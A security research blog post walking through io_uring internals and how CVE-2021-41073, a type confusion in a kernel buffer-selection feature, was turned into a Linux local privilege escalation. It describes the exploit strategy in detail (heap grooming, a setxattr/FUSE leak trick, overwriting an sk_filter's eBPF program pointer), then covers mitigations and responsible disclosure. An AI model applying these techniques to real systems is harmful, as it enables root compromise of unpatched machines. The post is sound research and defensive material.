Valentina Palmiotti
Sep 8, 2022

Put an io_uring on it: Exploiting the Linux Kernel

By: Valentina Palmiotti, @chompie1337

At Grapl we believe that in order to build the best defensive system we need to deeply understand attacker behaviors. As part of that goal we're investing in offensive security research. Keep up with our blog for new research on high risk vulnerabilities, exploitation, and advanced threat tactics.

This blog posts covers io_uring, a new Linux kernel system call interface, and how I exploited it for local privilege escalation (LPE)

A breakdown of the topics and questions discussed:

  • What is io_uring? Why is it used?
  • What is it used for?
  • How does it work?  
  • How do I use it?
  • Finding a vulnerability to exploit, CVE-2021-41073 [13].
  • Turning a type confusion vulnerability into memory corruption
  • Linux kernel memory fundamentals and tracking.
  • Exploring the io_uring codebase for tools to construct exploit primitives.
  • Creating new Linux kernel exploitation techniques and modifying existing ones.
  • Finding target objects in the Linux kernel for exploit primitives.
  • Mitigations and considerations to make exploitation harder in the future.

Like my last post, I had no knowledge of io_uring when starting this project. This blog post will document the journey of tackling an unfamiliar part of the Linux kernel and ending up with a working exploit. My hope is that it will be useful to those interested in binary exploitation or kernel hacking and demystify the process. I also break down the different challenges I faced as an exploit developer and evaluate the practical effect of current exploit mitigations.

io_uring: What is it?

Put simply, io_uring is a system call interface for Linux. It was first introduced in upstream Linux Kernel version 5.1 in 2019 [1]. It enables an application to initiate system calls that can be performed asynchronously. Initially, io_uring just supported simple I/O system calls like read() and write(), but support for more is continually growing, and rapidly. It may eventually have support for most system calls [5].

Why is it Used?

The motivation behind io_uring is performance. Although it is still relatively new, its performance has improved quickly over time. Just last month, the creator and lead developer Jens Axboe boasted 13M per-core peak IOPS [2]. There are a few key design elements of io_uring that reduce overhead and boost performance.

With io_uring system calls can be completed asynchronously. This means an application thread does not have to block while waiting for the kernel to complete the system call. It can simply submit a request for a system call and retrieve the results later; no time is wasted by blocking.

Additionally, batches of system call requests can be submitted all at once. A task that would normally requires multiple system calls can be reduced down to just 1. There is even a new feature that can reduce the number of system calls down to zero [7]. This vastly reduces the number of context switches from user space to kernel and back. Each context switch adds overhead, so reducing them has performance gains.

In io_uring a bulk of the communication between user space application and kernel is done via shared buffers. This reduces a large amount of overhead when performing system calls that transfer data between kernel and userspace. For this reason, io_uring can be a zero-copy system [4].

There is also a feature for “fixed” files that can improve performance. Before a read or write operation can occur with a file descriptor, the kernel must take a reference to the file. Because the file reference occurs atomically, this causes overhead [6]. With a fixed file, this reference is held open, eliminating the need to take the reference for every operation.

The overhead of blocking, context switches, or copying bytes may not be noticeable for most cases, but in high performance applications it can start to matter [8]. It is also worth noting that system call performance has regressed after workaround patches for Spectre and Meltdown, so reducing system calls can be an important optimization.[9].

What is it Used for?

As noted above, high performance applications can benefit from using io_uring. It can be particularly useful for applications that are server/backend related, where a significant proportion of the application time is spent waiting on I/O.

How Do I Use it?

Initially, I intended to use io_uring by making io_uring system calls directly (similar to what I did for eBPF). This is a pretty arduous endeavor, as io_uring is complex and the user space application is responsible for a lot of the work to get it to function properly. Instead, I did what a real developer would do if they wanted their application to make use of io_uring - use liburing.

liburing is the user space library that provides a simplified API to interface with the io_uring kernel component [10]. It is developed and maintained by the lead developer of io_uring, so it is updated as things change on the kernel side.

One thing to note: io_uring does not implement versioning for its structures [11]. So if an application uses a new feature, it first needs to check whether the kernel of the system it is running on supports it. Luckily, the io_uring_setup system call returns this information [12].

Because of the fast rate of development of both io_uring and liburing, the available documentation is out of date and incomplete. Code snippets and examples found online are inconsistent because new functions render the old ones obsolete (unless you already know io_uring very well, and want to have more low level control). This is a typical problem for OSS, and is not an indicator of the quality of the library, which is very good. I’m noting it here as a warning, because I found the initial process of using it somewhat confusing. Often times I saw fundamental behavior changes across kernel versions that were not documented.

For a fun example, check out this blog post where the author created a server that performs zero syscalls per request [3].

How Does it Work?

As its name suggests, the central part of the io_uring model are two ring buffers that live in memory shared by user space and the kernel. An io_uring instance is initialized by calling the io_uring_setup syscall. The kernel will return a file descriptor, which the user space application will use to create the shared memory mappings.

The mappings that are created:

  • The submission queue (SQ), a ring buffer, where the system call requests are placed
  • The completion queue (CQ), a ring buffer, where completed system call requests are placed.
  • The submission queue entries (SQE) array, of which the size is chosen during setup.
Mappings are created to share memory between user space and kernel

A SQE is filled out and placed in the submission queue ring for every request. A single SQE describes the system call operation that should be performed. The kernel is notified there is work in the SQ when the application makes an io_uring_enter system call. Alternatively, if the IORING_SETUP_SQPOLL feature is used, a kernel thread is created to poll the SQ for new entries, eliminating the need for the io_uring_enter system call.

An application submitting a request for a read operation to io_uring

When completing each SQE, the kernel will first determine whether it will execute the operation asynchronously. If the operation can be done without blocking, it will be completed synchronously in the context of the calling thread. Otherwise, it is placed in the kernel async work queue and is completed by an io_wrk worker thread asynchronously. In both cases the calling thread won’t block, the difference is whether the operation will be completed immediately by the calling thread or an io_wrk thread later.

When the operation is complete, a completion queue entry (CQE) is placed in the CQ for every SQE. The application can poll the CQ for new CQEs. At that point the application will know that the corresponding operation has been completed. SQEs can be completed in any order, but can be linked to each other if a certain completion order is needed.

Now that we have a good background on io_uring and how it works, we can move on to discussing the vulnerability.

Finding a Vulnerability

Why io_uring?

Before diving into the vulnerability, I will give context on my motivations for looking at io_uring in the first place. A question I get asked often is, “How do I pick where to reverse engineer/look for bugs/exploit etc.?”. There is no one-size-fits all answer to this question, but I can give insight on my reasoning in this particular case.

I became aware of io_uring while doing research on eBPF. These two subsystems are often mentioned together because they both change how user space applications interact with the Linux kernel. I am keen on Linux kernel exploitation, so this was enough to pique my interest. Once I saw how quicklyio_uring was growing, I knew it would be a good place to look. The old adage is true - new code means new bugs. When writing in an unsafe programming language like C, which is what the Linux kernel is written in, even the best and most experienced developers make mistakes [16].

Additionally, new Android kernels now ship with io_uring. Because this feature is not inherently sandboxed by SELinux, it is a good source of bugs that could be used for privilege escalation on Android devices.

To summarize, I chose io_uring based on these factors:

  • It is a new subsystem of the Linux kernel, which I have experience exploiting.
  • It introduces a lot of new ways that an unprivileged user can interact with the kernel.
  • New code is being introduced quickly.
  • Exploitable bugs have already been found in it.
  • Bugs in io_uring can be used to exploit Android devices (these are rare, Android is well sandboxed).

The Vulnerability

As I mentioned previously,io_uring is growing quickly, with many new features being added.

One such feature is IORING_OP_PROVIDE_BUFFERS, which allows the application to register a pool of buffers the kernel can use for operations.

Because of the asynchronous nature of io_uring, selecting a buffer for an operation can get complicated. Because the operation won’t be completed for an indefinite amount of time, the application needs to keep track of what buffers are currently in flight for a request. This feature saves the application the trouble of having to manage this, and treat buffer selection as automatic.

The buffers are grouped by a group ID, buf_group and a buffer id, bid. When submitting a request, the application indicates that a provided buffer should be used by setting a flag IOSQE_BUFFER_SELECT and specifies the group ID. When the operation is complete, the bid of the buffer used is passed back via the CQE [14].

I decided to play around with this feature after I saw the advisory for CVE-2021-3491 - a bug found in this same feature found by Billy Jheng Bing-Jhong [15]. My intention was to try to recreate a crash with this bug, but I was never able to get this feature to work quite right on the user space side. Fortunately, I decided to keep looking at the kernel code anyway, where I found another bug.

When registering a group of provided buffers, the io_uring kernel component allocates an io_buffer structure for each buffer. These are stored in a linked list that contain all the io_buffer structures for a given buf_group.

struct io_buffer {
        struct list_head list;
        __u64 addr;
        __u32 len;
        __u16 bid;
};

Each request has an associated io_kiocb structure, where information is stored to be used during completion. In particular, it contains a field named rw, which is a io_rw structure. This stores information about r/w requests:

struct io_rw {
        struct kiocb                       kiocb;
        u64                                addr;
        u64                                len;
};

If a request is submitted with IOSQE_BUFFER_SELECT , the function io_rw_buffer_select is called before the read or write is performed. Here is where I noticed something strange.

static void __user *io_rw_buffer_select(struct io_kiocb *req, size_t *len,
                                        bool needs_lock)
{
        struct io_buffer *kbuf;
        u16 bgid;

        kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
        bgid = req->buf_index;
        kbuf = io_buffer_select(req, len, bgid, kbuf, needs_lock);
        if (IS_ERR(kbuf))
                return kbuf;
        req->rw.addr = (u64) (unsigned long) kbuf;
        req->flags |= REQ_F_BUFFER_SELECTED;
        return u64_to_user_ptr(kbuf->addr);
}

Here, the pointer for the request’s io_kiocb structure is called req. On line 7 above, the io_buffer pointer for the selected buffer is stored in req→rw.addr. This is strange, because this is where the (user space) target address for read/writing is supposed to be stored! And here it is being filled with a kernel address…

It turns out that if a request is sent using the IOSQE_BUFFER_SELECT flag, the flag req->flags & REQ_F_BUFFER_SELECT is set on the kernel side. Requests with this flag are handled slightly differently in certain spots in the code. Instead of using req→rw.addr for the user space address, (io_buffer*) kbuf.addr is used instead.

Using the same field for user and kernel pointers seems dangerous - are there any spots where the REQ_F_BUFFER_SELECT case was forgotten and the two types of pointer were confused?

I looked in places where read/write operations were being done. My hope was to find a bug that gives a kernel write with user controllable data. I had no such luck - I didn’t see any places where the address stored in req→rw.addr would be used to do read/write if REQ_F_BUFFER_SELECT is set. However, I still managed to find a confusion of lesser severity in the function loop_rw_iter:

	*
 * For files that don't have ->read_iter() and ->write_iter(), handle them
 * by looping over ->read() or ->write() manually.
 */
static ssize_t loop_rw_iter(int rw, struct io_kiocb *req, struct iov_iter *iter)
{
        struct kiocb *kiocb = &req->rw.kiocb;
        struct file *file = req->file;
        ssize_t ret = 0;

        /*
         * Don't support polled IO through this interface, and we can't
         * support non-blocking either. For the latter, this just causes
         * the kiocb to be handled from an async context.
         */
        if (kiocb->ki_flags & IOCB_HIPRI)
                return -EOPNOTSUPP;
        if (kiocb->ki_flags & IOCB_NOWAIT)
                return -EAGAIN;

        while (iov_iter_count(iter)) {
                struct iovec iovec;
                ssize_t nr;

                if (!iov_iter_is_bvec(iter)) {
                        iovec = iov_iter_iovec(iter);
                } else {
                        iovec.iov_base = u64_to_user_ptr(req->rw.addr);
                        iovec.iov_len = req->rw.len;
                }

                if (rw == READ) {
                        nr = file->f_op->read(file, iovec.iov_base,
                                              iovec.iov_len, io_kiocb_ppos(kiocb));
                } else {
                        nr = file->f_op->write(file, iovec.iov_base,
                                               iovec.iov_len, io_kiocb_ppos(kiocb));
                }

                if (nr < 0) {
                        if (!ret)
                                ret = nr;
                        break;
                }
                ret += nr;
                if (nr != iovec.iov_len)
                        break;
                req->rw.len -= nr;
                req->rw.addr += nr;
                iov_iter_advance(iter, nr);
        }

        return ret;
}

For each open file descriptor, the kernel keeps an associated file structure, which contains a file_operations structure, f_op. This structure holds pointers to functions that perform various operations on the file. As the description for loop_rw_iter states, if the type of file being operated on doesn’t implement the read_iter or write_iter operation, this function is called to do an iterative read/write manually. This is the case for /proc filesystem files (like /proc/self/maps, for example).

The first part of the offending function performs the proper checks . On line 25 above, the iter structure is checked - if REQ_F_BUFFER_SELECT is set then iter is not a bvec, otherwise req→rw.addr is used as the base address for read/write.

The bug is found on line 49. As the function name suggests, the purpose is to perform an iterative read/write in a loop. At the end of the loop, the base address is advanced by the size in bytes of the read/write just performed. This is so the base address points to where the last r/w left off, in case another iteration of the loop is needed. For the case of REQ_F_BUFFER_SELECT, the base address is advanced by calling iov_iter_advance on line 50. No check is performed like in the beginning of the function - both addresses are advanced. This is a type confusion - the code treats the address in req→rw.addr as if it were a user space pointer.

Remember, if REQ_F_BUFFER_SELECT is set, then req→rw.addr is a kernel address and points to the io_buffer used to represent the selected buffer. This doesn’t really affect anything during the operation itself, but after it is completed, the function io_put_rw_kbuf is called:

static inline unsigned int io_put_rw_kbuf(struct io_kiocb *req)
{
        struct io_buffer *kbuf;

        if (likely(!(req->flags & REQ_F_BUFFER_SELECTED)))
                return 0;
        kbuf = (struct io_buffer *) (unsigned long) req->rw.addr;
        return io_put_kbuf(req, kbuf);
}

On line 5 above, the request’s flags are checked for REQ_F_BUFFER_SELECTED. If it is set, on line 8 the function io_put_kbuf is called with req→rw.addr as the kbuf parameter. The code for this called function is below:

static unsigned int io_put_kbuf(struct io_kiocb *req, struct io_buffer *kbuf)
{
        unsigned int cflags;

        cflags = kbuf->bid << IORING_CQE_BUFFER_SHIFT;
        cflags |= IORING_CQE_F_BUFFER;
        req->flags &= ~REQ_F_BUFFER_SELECTED;
        kfree(kbuf);
        return cflags;
}

As seen on line 8 above, kfree is called on kbuf (whose value is the address in req→rw.addr). Since this pointer was advanced by the size of the read/write performed, the originally allocated buffer isn’t the one being freed! Instead, what effectively happens is:

kfree(kbuf + user_controlled_value);

where user_controlled_value is the size of the completed read or write.

Since an io_buffer structure is 32 bytes, we effectively gain the ability to free buffers in the kmalloc-32 cache at a controllable offset from our originally allocated buffer. I’ll talk a little bit more about Linux kernel memory internals in the next section, but the below diagram gives a visual of the bug:

Exploitation

The previous section covered the vulnerability; now it’s time to construct an exploit. For those who want to skip right to the exploit strategy, it is as follows:

  • Set the affinity of application’s threads and io_wrk threads to the same CPU core, so they both use the same kmalloc-32 cache slab.
  • Spray the kmalloc-32 cache with io_buffer structures to drain all partially free slabs. Subsequent 32 byte allocations will be contiguous in a freshly allocated slab page. Now the vulnerability can be utilized as a use-after-free primitive.
  • The use-after-free primitive can be used to construct a universal object leaking, and overwriting primitive.
  • Use the object leaking primitive to leak the contents of an io_tctx_node structure, which contains a pointer to a task_struct of a thread belonging to our process.
  • Use object leaking primitive to leak contents of a seq_operations structure to break KASLR.
  • Use object spray primitive to allocate a fake bpf_prog structure.
  • Use object leaking primitive to leak contents of a io_buffer which contains a list_head field. This leaks the address of the controllable portion of the heap, which in turn gives the address of the fake bpf_prog.
  • Use object overwriting primitive to overwrite a sk_filter structure. This object contains a pointer to the corresponding eBPF program attached to a socket. Replace the existing bpf_prog pointer with the fake one.
  • Write to the attached socket to trigger the execution of the fake eBPF program, which is used to escalate privileges. The leaked task_struct is used to retrieve the pointer of cred structure of our process and overwrite uid and euid.

Building Primitives

The first step is to develop the exploit primitives. An exploit primitive is a generic building block for an exploit. An exploit will usually use multiple primitives together to achieve its goal (code execution, privilege escalation, etc). Some primitives are better than others - for example: arbitrary read and arbitrary write are very strong primitives. The ability to read and write at any address is usually enough to achieve whatever the exploit goal is.

In this case, the initial primitive we gain is pretty weak. We can free a kernel buffer at an offset we control. But we don’t actually know anything about where the buffer is or what is around it. It will take some creativity to turn it into something useful.

From Type Confusion to Use-After-Free (UAF)

Because we control the freeing of a kernel buffer, it makes the most sense to turn this primitive into a stronger use-after-free primitive. If you aren’t familiar with what a use-after-free is, here’s the basic idea: A program uses some allocated memory, then somehow (either due to a bug or an exploit primitive) that memory is freed. After it is freed, the attacker triggers the reallocation of the same buffer and the original contents are overwritten. If the program that originally allocated the memory uses it after this occurs, it will be using the same memory, but its contents have been reallocated and used for something else! If we can control the new contents of the memory, we can influence how the program behaves. Essentially, it allows for overwriting an object in memory.

Now, the basic plan is simple: allocate an object, use the bug to free it, then reallocate the memory and overwrite with controllable data. At this point, I didn’t know what kind of object to target. First I had to try to overwrite any object in the first place.

This turned out to be a good idea, because initially I was not able to reliably trigger the reallocation of the buffer freed by the bug. As shown below, the freed buffer has a different address than the reallocated buffer.

Debugging exploit in the kernel with printk()

My first inclination was that buffer size had something to do with it. 32 bytes is small, and there are a lot of kernel objects of the same size. Perhaps the race to allocate the freed buffer was lost every single time. I tested this by altering the definition of the io_buffer structure in the kernel. After some experimentation with different sizes, I confirmed that buffer size wasn’t the problem.

After learning a bit about Linux kernel memory internals and some debugging, I found the answer. You don’t need to deeply know Linux kernel memory internals to understand this exploit. However, knowing the general idea of how virtual memory is managed can be important for memory corruption vulnerabilities. I’ll give a very basic overview and point out the relevant parts in the next section.

Linux Kernel Memory: SLOB on my SLAB

The Linux Kernel has several memory allocators in the code tree which include: SLOB, SLAB, and SLUB. They are mutually exclusive - you can only have one of them compiled into the kernel. These allocators represent the memory management layer that works on top of the system’s low level page allocator [20].

The Linux kernel currently uses the SLUB allocator by default. For background, I will give a very brief explanation on how this memory allocator works.

SLUB stores several memory caches that each hold the same type of object or generic objects of similar size.

Each one of these caches is represented by a kmem_cache structure, which holds a list of free objects and a list of slabs. Slabs (not to be confused with SLAB which is a different Linux kernel memory allocator) consist of one or more pages that are sliced into smaller blocks of memory for allocation. When the list of free objects is empty, a new slab page is allocated. In SLUB, each slab page is associated with a CPU. Each free object contains a metadata header that includes a pointer for the next free object in the cache.

Though it isn’t necessary to understand the rest of this post, if you want to know more about the internals of the Linux kernel memory allocators check out these great blog posts [20] [21][23] and these slides [22].

Memory Grooming

The first goal is to get contiguously allocated buffers. Given nature of the bug, the target object for UAF needs to be at a positive offset from the originating io_buffer and the offset has to be knowable.

We can start by draining the cache’s freelist and ensuring that a fresh slab page is allocated. Afterwards, subsequent allocations will be contiguous to each other on the same slab page. We do this by triggering the allocation of many 32 byte objects, which can be done by registering many buffers using io_uring_prep_provide_buffers. Remember, an io_buffer object will be allocated for each buffer registered.

io_uring_prep_provide_buffers(sqe, bufs1, 0x100, 1000, group_id1, 0);

The above line of code above triggers the allocation of 1000 32 byte io_buffer structures in the kernel. They will each stay in memory until they are used to complete an io_uring request. That means they can be kept in memory indefinitely.

When the target object is allocated, it should land next to the io_buffer structs that were just sprayed. Luckily, provided buffers for each buf_group are used in Last-In-First-Out (LIFO) order. So, the first io_buffer used for an operation will be the last one that was allocated. Now the offset to the target object is knowable!

What About CONFIG_SLAB_FREELIST_RANDOM?

The kernel configuration CONFIG_SLAB_FREELIST_RANDOM (which is set in distributions like Ubuntu) randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This means allocations on a new slab page will not be contiguous in virtual memory.

This mitigation is annoying, but easily by-passable. The first step is the same: spray to ensure an io_buffer struct lands in a freshly allocated slab page. Then, spray the cache with target objects. This way, there is a high likelihood of a target object being allocated contiguously to the io_buffer that will trigger the freeing. The randomization only applies to the order buffers are added to the freelist - the list itself is still LIFO.

Bypassing CONFIG_SLAB_FREELIST_RANDOM

Linux Kernel Memory Tracking

There are a lot of ways to track Linux kernel memory. I decided to learn at least one them and chose the kmem event tracing subsystem, which is built using ftrace. I chose it because it seems like the least amount of effort required. I don’t want to write any code - even one line is too many.

The setup is simple, pass the following in the boot parameters in your kernel: trace_event=kmem:kmalloc,kmem:kmem_cache_alloc,kmem:kfree,kmem:kmalloc_node

and you can trace all memory allocations and frees in the kernel by running:cat /sys/kernel/debug/tracing/trace. To deobfuscate the virtual memory addresses you can add no_hash_pointers to the kernel boot parameters.

Tracking kernel memory

The first, second, and third columns represent the task name, pid, and the CPU ID of the calling thread, respectively. On the first line, you can see the buffer that is freed by the bug in io_put_kbuf (which is inlined into kiocb_done during compilation). On the second line, is the attempt to reallocate this freed buffer.

Now with a basic background of how Linux kernel memory and io_uring works, can you spot the problem?

The buffer is being freed in a thread running on CPU 0 and the reallocation attempt is happening on CPU 1. Now the problem is obvious! The completion of the io_uring read request happens asynchronously, so it happens in the context of an io_wrk thread. The reallocation happens in a thread from our process. Remember that cache slab pages are processor specific, so it’s necessary that the free and reallocation occur on the same CPU.

I already knew, from Jann Horn’s research, that sched_setaffinity can be used to pin a thread to run a specific CPU core [17]. Unfortunately, this only applies to threads from our own application. We also need a way to control the affinity of the io_wrk thread created by the io_uring kernel component.

Exploring io_uring Features

Because io_uring is performance oriented, I looked for a feature that gives the application control over the affinity of io_wrk threads. I got extremely lucky, as this io_uring feature was introduced a few months prior - just in time for me to abuse it [18]. Using IORING_REGISTER_IOWQ_AFF, you can set the CPU affinity for iou_wrk threads. I can pin the thread from my process and the iou_wrk thread to the same CPU core, using sched_setaffinity and io_uring_register_iowq_aff respectively.

Now the reallocation works as expected:

Now that a reallocation can be triggered reliably, let’s figure out what to do with it.  

Universal Heap Spray

Once I was able to successfully turn the bug into a UAF, I immediately revisited Vitaly Nikolenko’s research. He created a Linux kernel exploit technique for a universal heap spray using the setxattr system call [19].

This universal heap spray technique provides a way to:

  • Allocate an object of any size
  • Control the contents of the object
  • Keep the object in memory indefinitely

The setxattr system call sets the value of an extended attribute associated with a file. When it is executed, the kernel allocates a buffer (of a size controlled by the calling user space application (line 10 below) and copies the user provided attributes buffer into it (line 13).

static long
setxattr(struct user_namespace *mnt_userns, struct dentry *d,
     const char __user *name, const void __user *value, size_t size,
     int flags)
{
   ...
    if (size) {
        if (size > XATTR_SIZE_MAX)
            return -E2BIG;
        kvalue = kvmalloc(size, GFP_KERNEL);
        if (!kvalue)
            return -ENOMEM;
        if (copy_from_user(kvalue, value, size)) {
            error = -EFAULT;
            goto out;
        }
    ...
    error = vfs_setxattr(mnt_userns, d, kname, kvalue, size, flags);
out:
    kvfree(kvalue);
    return error;
}

userfaultfd allows a user space application to handle page faults, something that would otherwise be handled by the kernel. That means that if the memory pointed to by value in the above code is registered with userfaultfd, the copy_from_user call will block until the application resolves the page fault.

Now imagine mapping two adjacent pages of memory, and the second page has a userfaultfd page handler set. The value buffer is of size n : n-8 bytes are on the first page and the remaining 8 bytes on the second page. The kernel will handle the page fault of the first page and copy n-8 bytes into the kernel buffer. Then, it will block for the final 8 bytes waiting for user space to resolve the page fault of the second page.

With this technique, an unprivileged application can allocate a kernel object of size n written with n-8 bytes of controllable data, and the object stays in memory indefinitely.

userfaultfd is over, FUSE is in

The Linux kernel now provides a Kconfig knob to disable userfaultfd for unprivileged users, vm.unprivileged_userfaultfd. It is set to true by default in most major Linux distributions.

However, the same primitive can be achieved by an unprivileged user using FUSE [24]. FUSE provides a framework for implementing a filesystem in user space. What does this mean for exploitation? Files on a FUSE filesystem can have read/writes forwarded to a user space application. We can block the kernel during user space copy/writes by using a memory mapping of a FUSE file.

Instead of mapping two pages and setting a userfaultfd fault handler on the second page, we create one anonymous mapping and one file mapping, using the addr parameter of mmap to ensure the two pages are contiguous in memory.

Universal Object Overwrite

The universal heap spray technique is perfect for use-after-frees. After the object has been freed, setxattr will trigger the allocation of the object of size n, overwrite the first n-8 bytes, and then block. Since we successfully turned the vulnerability into a use-after-free primitive, we’ll use this to overwrite arbitrary objects in memory that are allocated from the kmalloc-32 cache.

Universal Heap Leak - A New Technique

Before thinking about types of objects to overwrite, an information leak technique is needed to find where things are in memory (function addresses, credential structures, heap pointers, etc). I realized I could turn the aforementioned technique from a universal heap spray primitive into a universal heap leak primitive with this one weird trick. In the original UAF use case for this technique, setxattr reallocates a buffer that has already been freed. But what if the setxattr buffer is freed instead?

One Weird Trick

First, use the heap spray technique: call setxattr which blocks copying the last 8 bytes from user space. At this point most of the data has been copied over to the allocated kernel buffer already. In another thread, trigger the freeing of the setxattr buffer, using the bug. Then, trigger the allocation of the object to leak. This should reallocate and overwrite the kernel buffer that setxattr is using to store attribute data. Finally, unblock setxattr. Now the kernel will use the data in kvalue (line 10) to set the file attribute. Extended file attributes are stored as binary data. To get an extended attribute of a file, we can use setxattr ‘s counterpart - getxattr. Remember, when the attribute is set, the kernel buffer used is overwritten with the data from the new object.

So, the contents of the object can be leaked by calling getxattr:

setxattr("lol.txt", "user.lol", xattr_buf, 32, 0);
getxattr("lol.txt", "user.lol", leakbuf, 32);

Target Objects

So far I’ve only spoken about general techniques. We haven’t picked what objects we want to use along with the techniques. I haven’t seen the objects I chose used in other exploits, so hopefully it can provide ideas for exploiting a tough cache like kmalloc-32.

When first looking for looking for objects, I looked within io_uring itself first. There are a lot of interesting objects, many of which contain pointers to cred and task_struct structures. I have not seen other kernel exploits utilizing io_uring objects until recently, when I came across a blog post by Awaru [25].

I used a couple of other strategies to find target objects as well. One was using Linux kernel memory tracing on a test machine and seeing what 32-byte objects are allocated. I also wrote a quick script using pahole to output all of the structures of a specific size. One trick I learned from Alexander Popov’s blog post is to enable features that are common across many distros, which increases the number of kernel objects available [26].

Objects for Leaking:

io_tctx_node:

An io_tctx_node structure is allocated for a new thread that sends an io_uring request. There can be multiple io_ctx_nodes in a single process if multiple threads call into io_uring. The field to leak is task, the pointer of the thread’s task_struct. The allocation of this object can be triggered by creating a new thread and making an io_uring system call.

io_buffer:

The io_buffer structure is covered at length in the vulnerability section. The field to leak is list, a list_head structure that links the buffer to the rest of the buffers in the buf_group. Leaking this give the relative position on the slab so the address of the objects sprayed can be calculated. I later realized this object could also be used to build an arbitrary free primitive, by modifying the list members and unregistering multiple buffers. This is just a thought; this technique wasn’t used in this exploit.

seq_operations:

A seq_operations structure is allocated when a process opens a seq_file. This structure stores the pointers to functions that do sequential operations on the file. By opening /proc/cmdline , this structure will be allocated. Leaking this object gives a pointer to several functions. In particular, I use the function single_next to break KASLR.

Object for Overwriting:

sk_filter:

An sk_filter structure is allocated when an already loaded eBPF program is attached to a socket. Of particular interest is the field prog, which contains a pointer to a bpf_prog structure that represents the attached eBPF program. By overwriting this pointer, we gain kernel execution. One thing to note: because prog is the last field in sk_filter, it is not covered in the n-8 bytes we can write to using the mentioned techniques. However, this is easily fixable. Instead of blocking in setxattr, we call getxattr immediately after and block. The setxattr kernel buffer will be reallocated in getxattr, and will be completely overwritten with the desired contents before blocking in copy_to_user.

Putting It all Together

As stated above, we gain execution by overwriting the prog pointer in an sk_filter . A bpf_prog structure has field bpf_func which contains a pointer to the function that gets called when the associated socket has data written to it. When the function is called, the second parameter contains a pointer to bpf_prog field insns, which is an array with BPF instructions that is used by the eBPF interpreter.

At this point, there are a few options:

Put bpf_prog_run for the bpf_func field, which is the function that decodes and executes BPF instructions if the program is not JIT compiled. Then put eBPF bytecode instructions that overwrite creds in the insns array. This is an option even if eBPF JIT is configured. However, if the Kconfig CONFIG_BPF_JIT_ALWAYS_ON is set, the interpreter is not compiled into the kernel.

Another option is to look for ROP gadgets in the kernel to call instead. This idea was inspired by Alexander Popov’s original exploit for CVE-2021-26708 [26].

We need a gadget that will:

  1. Dereference the insns pointer, where we place the pointer &task_struct→cred
  2. Writes 0 to the uid offset
  3. Writes 0 to euid offset
  4. Returns

It’s possible to derive the exit value of an eBPF program, so we can first leak the address to task→cred and repeat the process with the uid and euid overwrites. With a leak, the operations can be split up into two ROP gadgets. This gives some flexibility on what gadgets can be used, and increases the likelihood of the kernel containing the necessary gadgets.

Last but not least, we have another option: JIT smuggling. This term, coined by Amy Burnett for browser exploitation, refers to tricking a JIT compiler into creating ROP gadgets for use in an exploit. The same technique can be used for the eBPF JIT compiler. Instead of leaking the address of single_next, leak the address of our original bpf_prog. We can use our original JIT compiled eBPF program to smuggle the ROP gadgets we need. Since the program is on an executable page, we can call into any portion of it. After calculating the offset of the program where the needed ROP gadget lies, write the address in the bpf_func field.

There are many other ways to exploit this bug. I came up with a few more ideas while writing this blog post. Can you think of any more?

Demo

Find the proof-of-concept (PoC) exploit code along with a test VM here.

Mitigations

The io_uring subsystem introduces a large and rapidly growing kernel code base that is reachable as an unprivileged user. It’s a system call interface so it is inherently hard to sandbox; we depend on system call filtering for sandboxing, ex: seccomp and SELinux . io_uring redefines how user space interacts with the kernel, and is accessible as an unprivileged user on 5.1 >= kernels, which includes growing number of Android devices. Additionally, you need to enable CONFIG_EXPERT in the kernel to even have the option to disable it. For these reasons, I believe io_uring is going to have an important impact on the future of Linux related security.

I’ll present mitigations that offer some protection against the exploit techniques I’ve outlined in this post, and discuss their effectiveness. I’ll also present some considerations for the future of Linux kernel hardening.

Existing Mitigations

First I’ll cover the mitigations for which I’ve already discussed bypasses:

CONFIG_SLAB_FREELIST_RANDOM randomizes the order in which buffers get added to the freelist when a new slab page is allocated. This mitigation is helpful for heap overflow bugs that may depend on contiguous object allocation to be exploitable. However, I don’t believe it is particularly effective for UAF or vulnerabilities giving a controllable free. As Jann Horn notes in this Linux kernel exploitation writeup, if you can control the order of what gets freed, then you can control the freelist, and the randomization is nullified [27]. There is a low performance cost to this mitigation, as the randomization only occurs when a new slab page is allocated.

CONFIG_BPF_JIT_ALWAYS_ON removes the eBPF interpreter from the kernel. The intent of this mitigation is to reduce the number of usable exploitation gadgets. While I’ve discussed a number of bypasses in the context of this exploit, it should always be set if eBPF JIT is enabled. As a mitigation, it comes at no cost performance wise and removes a potential primitive for attackers.

Some additional suggestions:

CONFIG_BPF_UNPRIV_DEFAULT_OFF turns off eBPF for unprivileged users by default. This can be modified via a sysctl knob while the system is running. Whether this mitigation is appropriate will depend on whether your system needs to let unprivileged users run eBPF programs. If not, turning off eBPF for unprivileged users reduces attack surface in terms of exploiting eBPF itself, as well as making eBPF unavailable to use as a primitive, as shown in this exploit. While this mitigation won’t directly affect the exploitability of this vulnerability, it does block a very useful primitive. This will force an attacker to be more creative and come up with another way to gain kernel execution or read/write abilities.

CONFIG_SLAB_FREELIST_HARDENED will check the if a free object’s metadata is valid. This mitigation will not protect against any of techniques shown in this writeup, but it blocks other primitives that can be built with the vulnerability. For example, if a kernel buffer is blocking for a user copy and then freed, the freelist metadata can be overwritten after the copy is unblocked, and an attacker has control over the pointer of the next free object. This type of freelist control primitive is blocked by this mitigation, which first checks whether the free object is actually within a valid slab page before allowing it to be allocated. There are some minor performance costs that come with performing a check for every freed object.

Future Considerations

Implementing control flow integrity for eBPF programs would block several of the techniques discussed in this post. When an eBPF program is verified and JIT compiled, the official entry point can be added to a list of valid targets that is checked before a program is run. This would block the previously discussed general ROP technique, the JIT smuggling technique, as well as the interpreter technique (if JIT is turned on).

The next consideration, while not a mitigation, is a simple but fundamental measure to improve software security. The vulnerability exploited in this post would have easily been found if basic unit tests were written for the IORING_OP_PROVIDE_BUFFERS feature. It was only after the second exploitable vulnerability in this feature was reported for any tests to be committed [32]. Because of the rapid growth in both system call support and features of io_uring in the upstream kernel, it is important to provide accompanying tests so that easily findable vulnerabilities like this one don’t slip by.

Security Disclosure Timeline

9/8/2021: I find the vulnerability. I write a PoC to make sure my assumptions are correct.

9/11/2021: I disclose the vulnerability to security@kernel.org and share the PoC.

9/11/2021:  Report is forwarded to io_uring developers and acknowledged.

9/11/2021:  A potential patch is provided.

9/12/2021:  I review and test the patch. I confirm it fixes the issue. Jens asks me what email I want to use for my “Reported By Tag”. I respond with my work email, to which he is apprehensive because the domain name makes it obvious the patch is a security issue. I give my personal email instead, which he accepts.

